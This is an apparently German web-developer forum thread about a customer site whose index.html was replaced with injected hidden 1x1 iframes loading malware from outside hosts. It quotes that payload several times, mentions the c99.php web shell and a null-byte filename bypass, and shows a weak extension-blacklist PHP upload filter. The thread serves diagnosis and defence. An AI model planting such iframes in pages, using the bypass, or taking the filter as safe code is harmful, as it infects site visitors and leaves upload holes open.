Site gehackt?
0 0 
Struppi
0 0 0 
Manuel B.
0 
Der Martin
0
0
Site gehackt?
holla miteinander,
gestern musste ich mit erschrecken feststellen, das der inhalt der index.html von einer Kundensite einfach so gelöscht wurde. nachdem ich sie gestern abend wieder hochgeladen habe, haben irgendwelche lebensunwerten scriptkiddies mir folgendes in die index.html geschrieben:
<!-- ~ --><iframe src='http://traffstats.biz/strong/014/' width=1 height=1></iframe>
<iframe src='http://traffstats.biz/adv/new.php?adv=14' width=1 height=1></iframe><iframe src="http://yepjnddqpq.biz/dl/adv649.php" width=1 height=1></iframe>
<!-- ~ -->
beim aufruf der site schlägt der virus-scan sofort an. sehr unschön wie ich finde und nicht gerade gut für die kunden die die site besuchen.
obwohl ich beim hochladen die schreibrechte eingeschränkt habe ist es den arschgeigen wieder gelungen. wie zur hölle machen die das und wieso haben die zugriff ins stammverzeichniss?
bitte helft mir mal.
grüße
-
Hallo!
Ändere die Passwörter und melde es am besten deinem Provider, der dir dann helfen kann. Dazu auch dieser Artikel: http://aktuell.de.selfhtml.org/artikel/gedanken/passwort/index.htm#
ciao, ww
-
<!-- ~ --><iframe src='http://traffstats.biz/strong/014/' width=1 height=1></iframe>
<iframe src='http://traffstats.biz/adv/new.php?adv=14' width=1 height=1></iframe><iframe src="http://yepjnddqpq.biz/dl/adv649.php" width=1 height=1></iframe>
<!-- ~ -->
beim aufruf der site schlägt der virus-scan sofort an. sehr unschön wie ich finde und nicht gerade gut für die kunden die die site besuchen.
Falls du den IE als Browser verwendest, würd ich mich genau auf deinem Rechner umschauen (deine Besucher auch), der Code scheint eine ganze Menge Schweinereien zu machen.
Wenn ich auf den obigen gehe, erhalte ich einen JS Code der eine Menge ActiveX controls versucht zu laden.
Ich hab mir den Code mal angeschaut und nach eine paar Begriffen gesucht, evtl. ist das dieser http://www.milw0rm.com/exploits/2448Struppi.
--
Javascript ist toll (Perl auch!) -
Hallo Konsument,
[...]lebensunwerten scriptkiddies
[...]
den arschgeigen wieder gelungen. wie zur hölle machen die das und wieso haben die zugriff ins stammverzeichniss?
Mann, du musst ja echt einen ziemlichen Hass haben (obwohl ich das angesichts des Sachverhaltes durchaus verstehen kann...)
Zur eigentlichen Fachfrage: Nutzt du auf dem Server irgendwo PHP und benutzt vielleicht den include Befehl etwas nachlässig?
(Wie du vielleicht siehst, ist dieser Bericht schon älter...)
Oder hast du wohlmöglich irgendwo auf deinen Sites einen file-upload und kontrollierst nicht scharf genug, was da hochgeladen wird?Ich hatte auf meinen Privatseiten einen Bilder-Upload (einfach, um mal die Möglichkeit zu demonstrieren) und habe in den letzten Tagen zweimal eine Hinweismail bekommen, dass jemand versucht hat, c99.php hochzuladen (bisher funktioniert meine Methode, dass ich mir
- jedesmal selbst eine mail schicken lassen, welche files hochgeladen wurden und
- Skripte gar nicht erst akzeptiere.
)
Trotzdem wurde es mir nun zu heiss und ich habe das upload-Formular ganz rausgenommen, denn wenn so ein Dreck wie c99.php erstmal auf dem Server ist, kann man den wahrscheinlich komplett plattmachen und ganz neu aufsetzen - Ich war beim Nachforschen, was c99.php überhaupt ist, ziemlich erstaunt, wie ausgefeilt die Techniken zum Kapern von Webservern offenbar inzwischen sind ;-) Na gut, vielleicht war ich auch vorher ziemlich naiv...)
Letzten Endes bräuchten wir wohl mehr Informationen von dir, was du für Seiten betreibst. Die Möglichkeiten, irgendwie Zugriff zu bekommen sind jedenfalls vielfältig :-(
Liebe Grüße mbr
-
Hellihello mbr,
Ich hatte auf meinen Privatseiten einen Bilder-Upload (einfach, um mal die Möglichkeit zu demonstrieren) und habe in den letzten Tagen zweimal eine Hinweismail bekommen, dass jemand versucht hat, c99.php hochzuladen (bisher funktioniert meine Methode, dass ich mir
- jedesmal selbst eine mail schicken lassen, welche files hochgeladen wurden und
- Skripte gar nicht erst akzeptiere.
Wie machst du das? Die Endungen kontrollieren? Oder mit irgendeinem php-Befehel (get_imagesize oder ähnlichem) testen, ob es ein Bild ist?
Wie geht denn sonst der Trick: man lädt statt dem Bild die "schadcode.php" hoch und versucht dann, sie mit "example.com/bilder/schadcode.php" direkt zu aktivieren?
Dank und Gruß,
frankx
-
Ich grüsse den Cosmos,
Wie machst du das? Die Endungen kontrollieren? Oder mit irgendeinem php-Befehel (get_imagesize oder ähnlichem) testen, ob es ein Bild ist?
Wenn es Textdateien sind, einfach mal alle < und > durch > und < ersetzen, dann dürftest du schon das meiste an Scriptattacken ausgeschalten haben.
Möge das "Self" mit euch sein
--
Neulich dachte ich mir, einmal S/M ausprobieren wäre eine tolle Erfahrung. Also hab ich Windows gebootet ...
ie:{ br:> fl:| va:| ls:& fo:{ rl:( n4:{ de:] ss:) ch:? js:| mo:) sh:( zu:) -
Hallo,
Wie geht denn sonst der Trick: man lädt statt dem Bild die "schadcode.php" hoch und versucht dann, sie mit "example.com/bilder/schadcode.php" direkt zu aktivieren?
genau das könnte man tun, wenn keine Vorkehrungen getroffen werden. Wenn du nur mit getimagesize() prüfst, könnten jedoch *ausschließlich* Bilddateien hochgeladen werden. Wenn das für den Zweck genügt, okay.
Ansonsten würde ich noch radikaler vorgehen und in dem Verzeichnis, in dem die hochgeladenen Dateien schließlich landen, kein PHP ausführen - z.B. mit einer .htaccess-Datei mit der Direktive
AddType text/html .php
Eventuell, je nach Grundkonfiguration des Servers, dasselbe noch für die Extensions .php3, .php4 und .php5, fertig.
Ciao,
Martin--
Der Gast geht solange zum Tresen, bis er bricht. -
Hallo Frankx
erstmal tschuldigung für die etwas verspätete Antwort.
Bisher habe ich es so gemacht, dass ich mir für jede Datei, die hochgeladen wurde selbst eine mail geschickt habe, ferner hatte ich vor dem Umbenennen der Temporären Datei eine Abfrage drin, ob die Datei auf .php oder pl endet. Da der upload jetzt eh abgeschaltet ist kann ich den code ja auch hier mal posten (ja,ja, ich weiss: security by obscurity bringt eh nichts...)$perl=false; $php=false; if(eregi("\.pl$",$_FILES[datei][name])) { $perl=true; } if(eregi("\.php[0-9]?$",$_FILES[datei][name])) { $php=true; } if(!$php && !$perl) { copy($_FILES[datei][tmp_name],"./upload/".$_FILES[datei][name]); echo "Die Datei ".$_FILES[datei][name]." "; echo "(Größe: ".$_FILES[datei][size]." Bytes, Typ: ".$_FILES[datei][type].")<br>"; echo "wurde erfolgreich auf den Server uebertragen"; mail("example@example.org","neue Datei","hi,\nEs wurde eine neue Datei hochgeladen:".$_FILES[datei][name],"from:test@example.org\r\n"); } else { copy($_FILES[datei][tmp_name],"./upload/quarantaene/".$_FILES[datei][name]."qnt"); unlink($_FILES[datei][tmp_name]); echo "sorry keine PHP und Perl-Scripts ;-)"; mail("example@example.org","alert","hi, \r\n Nachricht von privat/php_kurs/wo2tag2/auswertung. \r\n Datum: ".date("d.m.Y")."\r\n Es wurde versucht, ein Skript hochzuladen:".$_FILES[datei][name],"from:test@example.org\r\n"); }Es kann übrigens auch sein, dass es zusätzlich nützlich war, dass der Ordner auswertung über .htaccess vor Zugriffen geschützt war. Wie gesagt: in letzter zeit hatte ich zweimal eine warnmail bekommen, dass versucht wurde c99.php hochzuladen und nun hab ich den upload erstmal komplett eingestellt. War ja eh nur als Beispiel gedacht. Und bevor jetzt irgendjemand einen Weg findet, die Prüfung doch zu umgehen lasse ich es dann lieber ganz (ich hab zum Beispiel mal im Netz - leider finde ich die genaue Seite jetzt nicht mehr - gelesen, dass dateinamen wie c99.php%00.jpg einen solchen Schutz umgehen sollten. Bei Tests meinerseits hat das zwar nicht geklappt, das heißt: der Schutz hat weiterhin funktioniert - aber man kann ja nie wissen).
Der Vorschlag, mittels PHP direkt zu untersuchen, ob es sich um ein Bild handelt, ist natürlich sehr gut. Vieleicht werde ich das Beispiel doch wieder online stellen. Obwohl: Skripte sind ja nur das eine Problem. Was mache ich, wenn mich jemand mit einigen mehrere hundert MB großen Bildern zumüllt? Oder noch besser: mit mehreren tausend kleinen Bildchen. Und wohlmöglich handelt es sich dann noch um irgendwelche "illegalen" Sachen: (Kinder)Porno, NS-Symbole, weiss-der-kukuk-was-einem-noch-so-einfälltLiebe Grüße mbr
P.S.: Vielleicht bin ich auch einfach nur paranoid (*umguck*)
-
hi!
bei mir dasselbe... sonst wurde aber nichts verändert.
auch auf meinem server habe ich keine veränderungen festgestellt.
anscheinend wurde nur die index.html einer einzigen domain gehackt... sehr komisch!?(habe die vermutung dass es an einem flash file liegt, das ich nun aus der index.html entfernt habe... mal abwarten ob sich wieder etwas ändert oder alles safe bleibt.)
cu
holla miteinander,
gestern musste ich mit erschrecken feststellen, das der inhalt der index.html von einer Kundensite einfach so gelöscht wurde. nachdem ich sie gestern abend wieder hochgeladen habe, haben irgendwelche lebensunwerten scriptkiddies mir folgendes in die index.html geschrieben:
<!-- ~ --><iframe src='http://traffstats.biz/strong/014/' width=1 height=1></iframe>
<iframe src='http://traffstats.biz/adv/new.php?adv=14' width=1 height=1></iframe><iframe src="http://yepjnddqpq.biz/dl/adv649.php" width=1 height=1></iframe>
<!-- ~ -->
beim aufruf der site schlägt der virus-scan sofort an. sehr unschön wie ich finde und nicht gerade gut für die kunden die die site besuchen.
obwohl ich beim hochladen die schreibrechte eingeschränkt habe ist es den arschgeigen wieder gelungen. wie zur hölle machen die das und wieso haben die zugriff ins stammverzeichniss?
bitte helft mir mal.
grüße